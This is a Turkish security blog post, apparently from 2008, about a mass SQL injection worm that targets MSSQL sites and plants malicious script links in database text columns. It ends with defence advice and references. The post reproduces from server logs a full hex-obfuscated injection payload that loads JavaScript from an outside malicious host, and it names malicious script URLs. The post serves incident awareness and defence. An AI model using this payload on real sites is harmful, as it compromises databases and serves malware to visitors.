Son iki uc haftadir aralarinda hem yurt ici hem de yurtdisi oldukca ciddi sitelerin maruz kaldigi bir SQL Injection saldirisi var(google’dan aratildiginda hala cogu sayfada bu acigin devam ettigi goruluyor). Fakat bu seferki biraz farkli ve hatirladigim kadari ile ilk defa bu kadar yaygın otomatize(Worm) bir sql injection vakasi ile karsi karsiyayiz.
Worm kisaca arka planda veritabani sunucusu olarak MSSQL kullanan sayfalarda yeterli girdi kontrolu yapilmamis formlari bularak bu formlar araciligi ile veritabanindaki tum text sutunlara zararli bir kod yerlestiriyor(http://www.nihaorr1.com/1.js). Sonrasinda bu sayfalari ziyaret eden kullanicilar eger gerekli yamalari yuklememislerse sistemlerine Malware bulasiyor. Benzer yontemi 2006 ve 2007 yillarinda da gormustuk fakat bu sefer kullanilan yontem biraz daha farkli gozukuyor.
Web sunucu loglarina bakildiginda asagidakine benzer istekler gozukuyor. Bu da worm’u yazanlarin cesitli
engelleme tekniklerini asabilmek icin CAST statement kullandiklarini gosteriyor.
s=290′;DECLARE%[email protected]%20NVARCHAR(4000);SET%[email protected]=CAST(0x6400650063006C0061007200650
0200040006D00200076006100720063006800610072002800380030003000300029003B007300650
07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0
02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0
07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690
06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0
062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740
020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650
074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0
027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740
07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620
02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720
06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740
07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630
02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760
061007200630068006100720027003B00730065007400200040006D003D005200450056004500520
053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720
069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250
027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520
0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0
0%20AS%20NVARCHAR(4000));EXEC(@S);–
Worm’dan simdilik sadece MSSQL sunucular etkileniyor.
Saldirinin basarili olmasi sonucu ulasmaya calistigi zararli icerik barindiran web sayfalarina http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 adresinden izlenebilir.
Korunma Yollari:
i) Kullandiginiz web uygulama guvenlik duvari normalde bu tip ataklari engelleyebiliyor olmali. Eger bu tip bir atagi engelleyemeyen bir guvenlik cihazi kullaniyorsaniz yenisi ile degistirme zamaniniz geldi demektir.
ii)Modsecurity konusunda bilgi sahibi iseniz Modsecurity bunyesinde bulunan ucretsiz “Core rules” bu ve buna benzer ataklari ek ugras gerektirmeden bloklayabiliyor.
iii) Yazilim departmani ile gorusup kodlarini -ozellikle disardan girdi alan kod parcalarini- tekrar gozden gecirmelerini, otesinde bunu otomatize yapan araclarla yapmalarini tavsiye edebilirsiniz. Yine gunu kurtarma adina hangi kod parcalarinda bu hatanin bulundugunu bulmak icin web sunucu loglarindan icerisinde CAST gecen log satirlari incelenebilir.
iv) Alternatif bir koruma yontemi de SQL injection ile kodlara eklenen zararlı kod sayfalarının alınacağı hostlara erişimi yasaklamak. (Bu yontem gunu kurtarmak icin ise yarayabilir ama uzun vadede hedef sitelerin adreslerinin değişmesi ile işe yaramaz)
Detay Bilgi icin:
http://forums.iis.net/t/1148917.aspx?PageIndex=1
http://isc.sans.org/diary.html?storyid=3823&rss
http://www.modsecurity.org/blog/
Pingback: HP security labs’dan SQLinjection crawler araci -Scrawlr | Complexity is the Enemy of Security…